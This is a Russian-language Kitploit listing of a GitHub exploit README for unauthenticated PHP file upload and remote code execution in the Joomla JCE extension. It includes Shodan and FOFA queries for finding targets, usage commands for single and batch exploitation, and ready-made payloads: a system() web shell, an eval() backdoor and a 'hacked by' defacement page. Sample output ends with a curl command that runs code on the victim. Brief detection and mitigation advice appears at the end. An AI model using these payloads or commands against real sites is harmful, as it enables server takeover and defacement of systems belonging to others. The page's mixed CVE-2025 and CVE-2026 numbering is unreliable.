Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-48907 — CVE-2025-48907 - Эксплойт для неаутентифицированного RCE в Joomla JCE < 2.9.99.5 | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2026-48907
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHub0xgh057r3c0n/cve-2026-48907

CVE-2026-48907

CVE-2025-48907 - Эксплойт для неаутентифицированного RCE в Joomla JCE < 2.9.99.5

Репозиторий
41502 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Логотип Joomla

CVE-2026-48907 - Joomla! JCE Неавторизованное удаленное выполнение кода

Расширение Joomla! JCE < 2.9.99.5 - Неавторизованная загрузка произвольного PHP-файла и удаленное выполнение кода

License: MIT Python 3.6+ Security Shodan FOFA


🔎 Поисковые запросы

Shodan

root@kitploit:~
http.component:"Joomla"

FOFA

root@kitploit:~
app="Joomla"

📋 Обзор

Этот репозиторий содержит эксплойт доказательства концепции (PoC) для CVE-2026-48907, критической уязвимости в расширении Joomla! JCE (Joomla Content Editor) версий ниже 2.9.99.5. Уязвимость позволяет неавторизованным злоумышленникам загружать произвольные PHP файлы через функциональность импорта профилей JCE, что приводит к удаленному выполнению кода (RCE).

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных и авторизованных целей тестирования.

  • Используйте только на системах, которые вам принадлежат или на тестирование которых у вас есть явное разрешение.
  • Автор не несет ответственности за любое неправомерное использование или незаконные действия.
  • Всегда получайте надлежащее разрешение перед тестированием.

🔍 Детали уязвимости

СвойствоЗначение
CVE IDCVE-2026-48907
ПродуктРасширение Joomla! JCE
Затронутые версии< 2.9.99.5
Тип уязвимостиНеавторизованная загрузка PHP-файла → RCE
Оценка CVSS9.8 (Критический)
Вектор атакиСеть
АутентификацияНе требуется
ВоздействиеПолный компрометация системы

Как это работает

  1. Извлечение CSRF токена: Эксплойт сначала извлекает CSRF токен с домашней страницы цели.
  2. Злоупотребление импортом профилей: Он использует функциональность импорта профилей JCE (index.php?option=com_jce&task=profiles.import).
  3. Загрузка PHP файла: Загружает вредоносный PHP файл, замаскированный под XML файл профиля.
  4. Выполнение кода: Загруженный PHP файл помещается в каталог /tmp/ и может быть выполнен через прямой доступ.

🚀 Возможности

  • ✅ Загрузка любого PHP файла: Загрузка пользовательских PHP-шеллов, бэкдоров или страниц дефейса (на основе PHP).
  • ✅ Пакетная обработка: Сканирование и эксплуатация нескольких целей из файла.
  • ✅ Автообнаружение CSRF токена: Автоматическое извлечение CSRF токенов.
  • ✅ Подробный режим: Детальный вывод для отладки.
  • ✅ Экспорт результатов: Сохранение URL успешных загрузок в файл.

📦 Установка

root@kitploit:~
# Клонирование репозитория
git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git
cd CVE-2025-48907

# Установка необходимых зависимостей
pip3 install requests urllib3

Требования

  • Python 3.6 или выше
  • библиотека requests
  • библиотека urllib3

🎯 Использование

Базовый синтаксис

root@kitploit:~
python3 CVE-2025-48907.py -u <TARGET_URL> -F <PHP_FILE_TO_UPLOAD>

Примеры

Загрузка PHP-шелла

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php

Загрузка страницы дефейса

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php

Загрузка PHP-бэкдора

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php

Пакетная эксплуатация с файлом целей

root@kitploit:~
python3 CVE-2025-48907.py -f targets.txt -F payload.php

С подробным выводом и сохранением результатов

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt

Аргументы командной строки

АргументОбязательныйОписание
-u, --urlДа*Одиночный URL цели (например, http://target.com)
-f, --fileДа*Файл со списком URL целей (по одному на строку)
-F, --upload-fileДаPHP файл для загрузки (шелл, бэкдор, страница дефейса)
-v, --verboseНетВключить подробный вывод для отладки
-o, --outputНетСохранить URL успешных загрузок в файл

* Должен быть указан либо -u, либо -f

Формат файла с целями

Создайте файл targets.txt с одним URL на строку:

root@kitploit:~
http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# Комментарии игнорируются
https://example-joomla.com

🔧 Создание PHP нагрузок

Все нагрузки должны быть PHP файлами, так как эксплойт загружает PHP код, который будет выполнен на сервере.

PHP-шелл

Создайте shell.php:

root@kitploit:~
<?php
// Simple PHP Web Shell
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "Usage: ?cmd=command";
}
?>

Страница дефейса PHP

Создайте deface.php:

root@kitploit:~
<?php
// PHP Deface Page
echo '<!DOCTYPE html>
<html>
<head>
    <title>Hacked by 0xgh057r3c0n</title>
    <style>
        body {
            background: #000;
            color: #0f0;
            font-family: "Courier New", monospace;
            text-align: center;
            padding: 50px;
        }
        h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
        .ascii-art { white-space: pre; font-size: 12px; }
    </style>
</head>
<body>
    <h1>HACKED BY 0xgh057r3c0n</h1>
    <div class="ascii-art">
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ 
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
    ███████║███████║██║     █████╔╝ █████╗  ██║  ██║
    ██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██║  ██║
    ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██████╔╝
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
    </div>
    <p>Security is not a product, it\'s a process.</p>
    <p>Server: <?php echo $_SERVER["SERVER_SOFTWARE"]; ?></p>
    <p>Time: <?php echo date("Y-m-d H:i:s"); ?></p>
</body>
</html>';
?>

PHP-бэкдор (Минимальный)

Создайте backdoor.php:

root@kitploit:~
<?php
// Minimal PHP Backdoor
if(isset($_REQUEST['c'])) { eval($_REQUEST['c']); }
?>

📊 Пример вывода

root@kitploit:~
_____________   _______________         _______________   ________  ________            _____   ______  ________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/  _____/           /  |  | /  __  \/   __   \   _  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/   __  \   ______  /   |  |_>      <\____    /  /_\  \  /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  |__\  \ /_____/ /    ^   /   --   \  /    /\  \_/   \/    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \_____  /         \____   |\______  / /____/  \_____  /____/  
        \/                  \/                  \/     \/         \/     \/               |__|       \/                \/

Joomla! JCE extension < 2.9.99.5 Unauthenticated RCE
Author : 0xgh057r3c0n (PHP File Upload)

[*] Loaded 3 target(s)

[*] Target 1/3
[*] ==================================================
[+] Target: http://target-joomla.com
[+] Fetching CSRF token...
[+] CSRF Token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
[+] Uploading PHP file: cve-2026-48907-1234.xml.php
[+] Profile imported successfully!
[+] Testing uploaded PHP file...

============================================================
[!!!!!] PHP FILE UPLOADED SUCCESSFULLY!
[!!!!!] Server IS VULNERABLE to CVE-2025-48907!
============================================================

[+] View your uploaded PHP file: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php
[+] Quick access:
    curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id"

🛡️ Обнаружение и смягчение

Как обнаружить

  • Проверьте подозрительные PHP файлы в каталоге /tmp/
  • Отслеживайте активность импорта профилей JCE в журналах
  • Ищите неожиданные запросы index.php?option=com_jce&task=profiles.import
  • Проверяйте файлы с расширением .xml.php в /tmp/
  • Отслеживайте необычное выполнение PHP из каталога /tmp/

Меры по смягчению

  1. Обновление расширения JCE:

    • Обновите до версии 2.9.99.5 или выше
    • Загрузите с: Официальный сайт JCE
  2. Временные обходные меры:

    • Отключите расширение JCE, если оно не требуется
    • Внедрите правила веб-брандмауэра приложений (WAF)
    • Ограничьте выполнение PHP в каталоге /tmp/
    • Отключите allow_url_fopen, если это не требуется
  3. Действия после компрометации:

    • Удалите загруженные PHP файлы из /tmp/
    • Аудит системы на наличие бэкдоров
    • Сбросьте все учетные данные (администратор Joomla, FTP, хостинг)
    • Проверьте системные журналы на предмет несанкционированного доступа
    • Проверьте наличие других скомпрометированных файлов

📝 Лицензия

Этот проект лицензирован в соответствии с Лицензией MIT — подробнее см. в файле LICENSE.

License: MIT


🤝 Вклад

Приветствуются любые вклады! Пожалуйста, смело отправляйте Pull Request.

  1. Форкните репозиторий
  2. Создайте свою ветку для функции (git checkout -b feature/AmazingFeature)
  3. Зафиксируйте изменения (git commit -m 'Add some AmazingFeature')
  4. Отправьте в ветку (git push origin feature/AmazingFeature)
  5. Откройте Pull Request

⭐ История звезд

Если вы нашли этот инструмент полезным, пожалуйста, подумайте о том, чтобы поставить ему звезду ⭐ на GitHub!


📞 Контакты и поддержка

  • Автор: 0xgh057r3c0n
  • GitHub: https://github.com/0xgh057r3c0n/CVE-2025-48907
  • Проблемы: Сообщить об ошибке

🔗 Ссылки

  • NVD - CVE-2025-48907
  • Официальный сайт JCE
  • Центр безопасности Joomla!

Сделано с ❤️ от 0xgh057r3c0n
Скачать инструмент